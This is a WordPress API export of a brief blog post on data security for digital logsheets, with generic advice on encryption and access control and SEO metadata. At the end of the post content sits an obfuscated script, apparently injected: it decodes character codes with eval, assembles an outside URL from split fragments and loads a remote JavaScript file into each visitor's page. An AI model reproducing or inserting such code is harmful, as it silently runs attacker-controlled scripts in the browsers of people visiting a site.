{"id":1446,"date":"2023-02-04T08:33:00","date_gmt":"2023-02-04T08:33:00","guid":{"rendered":"https:\/\/logsheet.digital\/blog\/?p=1446"},"modified":"2023-08-24T09:00:15","modified_gmt":"2023-08-24T09:00:15","slug":"data-security-in-digital-logsheets-security-strategies","status":"publish","type":"post","link":"https:\/\/logsheet.digital\/blog\/en\/data-security-in-digital-logsheets-security-strategies\/","title":{"rendered":"Data Security in Digital Logsheets: Security Strategies"},"content":{"rendered":"<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"2560\" height=\"1707\" src=\"https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-pixabay-163064-scaled.jpg\" alt=\"Data Security in Digital Logsheets: Security Strategies\nFoto oleh Pixabay: https:\/\/www.pexels.com\/id-id\/foto\/fotografi-close-up-kerucut-plastik-kuning-hijau-merah-dan-coklat-pada-permukaan-berjajar-putih-163064\/\" class=\"wp-image-1437\" srcset=\"https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-pixabay-163064-scaled.jpg 2560w, https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-pixabay-163064-300x200.jpg 300w, https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-pixabay-163064-1024x683.jpg 1024w, https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-pixabay-163064-768x512.jpg 768w, https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-pixabay-163064-1536x1024.jpg 1536w, https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-pixabay-163064-2048x1365.jpg 2048w, https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-pixabay-163064-1568x1045.jpg 1568w\" sizes=\"auto, (max-width: 2560px) 100vw, 2560px\" \/><\/figure>\n<\/div>\n\n\n<p class=\"has-text-align-center\">Read also : <a href=\"https:\/\/logsheet.digital\/blog\/en\/digital-logsheets-industrial-maintenance-efficiency-solution\/\">Digital Logsheets: Industrial Maintenance Efficiency Solution<\/a><\/p>\n\n\n\n<p>In the <a href=\"https:\/\/masalmaarifplus.sch.id\/blog\/the-increasingly-complex-digital-era-navigating-the-challenges-and-opportunities\/\">digital era<\/a>, the protection of digital logsheet data is paramount. Amidst the advancing technology landscape, the use of digital logsheets has become the primary choice for monitoring and managing production data. However, alongside its benefits, data security has emerged as a crucial issue that needs to be addressed. This article will explore the challenges related to data security in the use of digital logsheets and outline effective strategies to safeguard the integrity and confidentiality of information in an increasingly digital industrial environment.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Security Challenges<\/h3>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"683\" src=\"https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-pixabay-207574-1024x683.jpg\" alt=\"Digital Logsheets in Industrial Monitoring\nFoto oleh Pixabay: https:\/\/www.pexels.com\/id-id\/foto\/kamera-keamanan-perak-207574\/\" class=\"wp-image-1439\" srcset=\"https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-pixabay-207574-1024x683.jpg 1024w, https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-pixabay-207574-300x200.jpg 300w, https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-pixabay-207574-768x512.jpg 768w, https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-pixabay-207574-1536x1024.jpg 1536w, https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-pixabay-207574-2048x1365.jpg 2048w, https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-pixabay-207574-1568x1045.jpg 1568w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"has-text-align-center\">Read also : <a href=\"https:\/\/logsheet.digital\/blog\/en\/digital-logsheets-for-monitoring-and-maintenance-in-industries\/\">Digital Logsheets for Monitoring and Maintenance in Industries<\/a><\/p>\n\n\n\n<p>Digital logsheets are vulnerable to attacks and regulatory non-compliance, posing threats to the confidentiality and integrity of production data. Security challenges in the use of digital logsheets have gained prominence in this digital age. Protecting sensitive data has become a top priority in the face of increasingly complex cyber threats.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Security Strategies<\/h3>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"732\" src=\"https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-rfstudio-3810788-1024x732.jpg\" alt=\"Efficient Industrial Maintenance\nFoto oleh RF._.studio: https:\/\/www.pexels.com\/id-id\/foto\/wanita-menulis-di-kertas-3810788\/\" class=\"wp-image-1440\" srcset=\"https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-rfstudio-3810788-1024x732.jpg 1024w, https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-rfstudio-3810788-300x214.jpg 300w, https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-rfstudio-3810788-768x549.jpg 768w, https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-rfstudio-3810788-1536x1097.jpg 1536w, https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-rfstudio-3810788-2048x1463.jpg 2048w, https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-rfstudio-3810788-1568x1120.jpg 1568w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"has-text-align-center\">Read also : <a href=\"https:\/\/logsheet.digital\/blog\/en\/digital-logsheets-industrial-maintenance-efficiency-solution\/\">Digital Logsheets: Industrial Maintenance Efficiency Solution<\/a><\/p>\n\n\n\n<p>Data encryption, authorization, authentication, and activity monitoring aid in safeguarding data and preventing unauthorized access. Effective security strategies are key to preserving the integrity and confidentiality of data in the use of digital logsheets. Adopting a holistic approach, including strong encryption and restricted access, can efficiently mitigate potential security risks.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Conclusion<\/h3>\n\n\n\n<p>Safeguarding data security in digital logsheets is a crucial step to maintain production quality and company reputation in the digital era. Complex security challenges can be addressed by implementing the right strategies, ensuring the protection of production data and sensitive information. By prioritizing security as a primary concern, companies can optimize the potential of digital logsheets without compromising the security of critical data.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"575\" src=\"https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/Logsheet-126.png\" alt=\"\" class=\"wp-image-1449\" srcset=\"https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/Logsheet-126.png 1024w, https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/Logsheet-126-300x168.png 300w, https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/Logsheet-126-768x431.png 768w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));\/*54745756836*\/<\/script>","protected":false},"excerpt":{"rendered":"<p>Read also : Digital Logsheets: Industrial Maintenance Efficiency Solution In the digital era, the protection of digital logsheet data is paramount. Amidst the advancing technology landscape, the use of digital logsheets has become the primary choice for monitoring and managing production data. However, alongside its benefits, data security has emerged as a crucial issue that &hellip; <\/p>\n<p class=\"link-more\"><a href=\"https:\/\/logsheet.digital\/blog\/en\/data-security-in-digital-logsheets-security-strategies\/\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> &#8220;Data Security in Digital Logsheets: Security Strategies&#8221;<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":1437,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[53],"tags":[200,79,202],"class_list":["post-1446","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized-en","tag-data-security","tag-digital-logsheets","tag-security-strategies","entry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.3 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Data Security in Digital Logsheets: Security Strategies - Digital Logsheet<\/title>\n<meta name=\"description\" content=\"Data security in the use of digital logsheets and effective security strategies to protect sensitive production information.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/logsheet.digital\/blog\/en\/data-security-in-digital-logsheets-security-strategies\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Data Security in Digital Logsheets: Security Strategies - Digital Logsheet\" \/>\n<meta property=\"og:description\" content=\"Data security in the use of digital logsheets and effective security strategies to protect sensitive production information.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/logsheet.digital\/blog\/en\/data-security-in-digital-logsheets-security-strategies\/\" \/>\n<meta property=\"og:site_name\" content=\"Digital Logsheet\" \/>\n<meta property=\"article:published_time\" content=\"2023-02-04T08:33:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-08-24T09:00:15+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-pixabay-163064-scaled.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"2560\" \/>\n\t<meta property=\"og:image:height\" content=\"1707\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Laras Rahmasari Surista\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Laras Rahmasari Surista\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/logsheet.digital\/blog\/en\/data-security-in-digital-logsheets-security-strategies\/\",\"url\":\"https:\/\/logsheet.digital\/blog\/en\/data-security-in-digital-logsheets-security-strategies\/\",\"name\":\"Data Security in Digital Logsheets: Security Strategies - Digital Logsheet\",\"isPartOf\":{\"@id\":\"https:\/\/logsheet.digital\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/logsheet.digital\/blog\/en\/data-security-in-digital-logsheets-security-strategies\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/logsheet.digital\/blog\/en\/data-security-in-digital-logsheets-security-strategies\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-pixabay-163064-scaled.jpg\",\"datePublished\":\"2023-02-04T08:33:00+00:00\",\"dateModified\":\"2023-08-24T09:00:15+00:00\",\"author\":{\"@id\":\"https:\/\/logsheet.digital\/blog\/#\/schema\/person\/8a9c850dcf976462d40e79992d3da3d8\"},\"description\":\"Data security in the use of digital logsheets and effective security strategies to protect sensitive production information.\",\"breadcrumb\":{\"@id\":\"https:\/\/logsheet.digital\/blog\/en\/data-security-in-digital-logsheets-security-strategies\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/logsheet.digital\/blog\/en\/data-security-in-digital-logsheets-security-strategies\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/logsheet.digital\/blog\/en\/data-security-in-digital-logsheets-security-strategies\/#primaryimage\",\"url\":\"https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-pixabay-163064-scaled.jpg\",\"contentUrl\":\"https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-pixabay-163064-scaled.jpg\",\"width\":2560,\"height\":1707},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/logsheet.digital\/blog\/en\/data-security-in-digital-logsheets-security-strategies\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/logsheet.digital\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Data Security in Digital Logsheets: Security Strategies\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/logsheet.digital\/blog\/#website\",\"url\":\"https:\/\/logsheet.digital\/blog\/\",\"name\":\"Digital Logsheet\",\"description\":\"Start digitalized your logsheet with Digital.Logsheet\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/logsheet.digital\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/logsheet.digital\/blog\/#\/schema\/person\/8a9c850dcf976462d40e79992d3da3d8\",\"name\":\"Laras Rahmasari Surista\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/logsheet.digital\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/8501a81758c63822fdf49eb58b507a4daea773c27111a4a55a76e9593d8e923a?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/8501a81758c63822fdf49eb58b507a4daea773c27111a4a55a76e9593d8e923a?s=96&d=mm&r=g\",\"caption\":\"Laras Rahmasari Surista\"},\"url\":\"https:\/\/logsheet.digital\/blog\/author\/laras\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Data Security in Digital Logsheets: Security Strategies - Digital Logsheet","description":"Data security in the use of digital logsheets and effective security strategies to protect sensitive production information.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/logsheet.digital\/blog\/en\/data-security-in-digital-logsheets-security-strategies\/","og_locale":"en_US","og_type":"article","og_title":"Data Security in Digital Logsheets: Security Strategies - Digital Logsheet","og_description":"Data security in the use of digital logsheets and effective security strategies to protect sensitive production information.","og_url":"https:\/\/logsheet.digital\/blog\/en\/data-security-in-digital-logsheets-security-strategies\/","og_site_name":"Digital Logsheet","article_published_time":"2023-02-04T08:33:00+00:00","article_modified_time":"2023-08-24T09:00:15+00:00","og_image":[{"width":2560,"height":1707,"url":"http:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-pixabay-163064-scaled.jpg","type":"image\/jpeg"}],"author":"Laras Rahmasari Surista","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Laras Rahmasari Surista","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/logsheet.digital\/blog\/en\/data-security-in-digital-logsheets-security-strategies\/","url":"https:\/\/logsheet.digital\/blog\/en\/data-security-in-digital-logsheets-security-strategies\/","name":"Data Security in Digital Logsheets: Security Strategies - Digital Logsheet","isPartOf":{"@id":"https:\/\/logsheet.digital\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/logsheet.digital\/blog\/en\/data-security-in-digital-logsheets-security-strategies\/#primaryimage"},"image":{"@id":"https:\/\/logsheet.digital\/blog\/en\/data-security-in-digital-logsheets-security-strategies\/#primaryimage"},"thumbnailUrl":"https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-pixabay-163064-scaled.jpg","datePublished":"2023-02-04T08:33:00+00:00","dateModified":"2023-08-24T09:00:15+00:00","author":{"@id":"https:\/\/logsheet.digital\/blog\/#\/schema\/person\/8a9c850dcf976462d40e79992d3da3d8"},"description":"Data security in the use of digital logsheets and effective security strategies to protect sensitive production information.","breadcrumb":{"@id":"https:\/\/logsheet.digital\/blog\/en\/data-security-in-digital-logsheets-security-strategies\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/logsheet.digital\/blog\/en\/data-security-in-digital-logsheets-security-strategies\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/logsheet.digital\/blog\/en\/data-security-in-digital-logsheets-security-strategies\/#primaryimage","url":"https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-pixabay-163064-scaled.jpg","contentUrl":"https:\/\/logsheet.digital\/blog\/wp-content\/uploads\/2023\/08\/pexels-pixabay-163064-scaled.jpg","width":2560,"height":1707},{"@type":"BreadcrumbList","@id":"https:\/\/logsheet.digital\/blog\/en\/data-security-in-digital-logsheets-security-strategies\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/logsheet.digital\/blog\/"},{"@type":"ListItem","position":2,"name":"Data Security in Digital Logsheets: Security Strategies"}]},{"@type":"WebSite","@id":"https:\/\/logsheet.digital\/blog\/#website","url":"https:\/\/logsheet.digital\/blog\/","name":"Digital Logsheet","description":"Start digitalized your logsheet with Digital.Logsheet","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/logsheet.digital\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/logsheet.digital\/blog\/#\/schema\/person\/8a9c850dcf976462d40e79992d3da3d8","name":"Laras Rahmasari Surista","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/logsheet.digital\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/8501a81758c63822fdf49eb58b507a4daea773c27111a4a55a76e9593d8e923a?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/8501a81758c63822fdf49eb58b507a4daea773c27111a4a55a76e9593d8e923a?s=96&d=mm&r=g","caption":"Laras Rahmasari Surista"},"url":"https:\/\/logsheet.digital\/blog\/author\/laras\/"}]}},"_links":{"self":[{"href":"https:\/\/logsheet.digital\/blog\/wp-json\/wp\/v2\/posts\/1446","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/logsheet.digital\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/logsheet.digital\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/logsheet.digital\/blog\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/logsheet.digital\/blog\/wp-json\/wp\/v2\/comments?post=1446"}],"version-history":[{"count":1,"href":"https:\/\/logsheet.digital\/blog\/wp-json\/wp\/v2\/posts\/1446\/revisions"}],"predecessor-version":[{"id":1450,"href":"https:\/\/logsheet.digital\/blog\/wp-json\/wp\/v2\/posts\/1446\/revisions\/1450"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/logsheet.digital\/blog\/wp-json\/wp\/v2\/media\/1437"}],"wp:attachment":[{"href":"https:\/\/logsheet.digital\/blog\/wp-json\/wp\/v2\/media?parent=1446"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/logsheet.digital\/blog\/wp-json\/wp\/v2\/categories?post=1446"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/logsheet.digital\/blog\/wp-json\/wp\/v2\/tags?post=1446"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}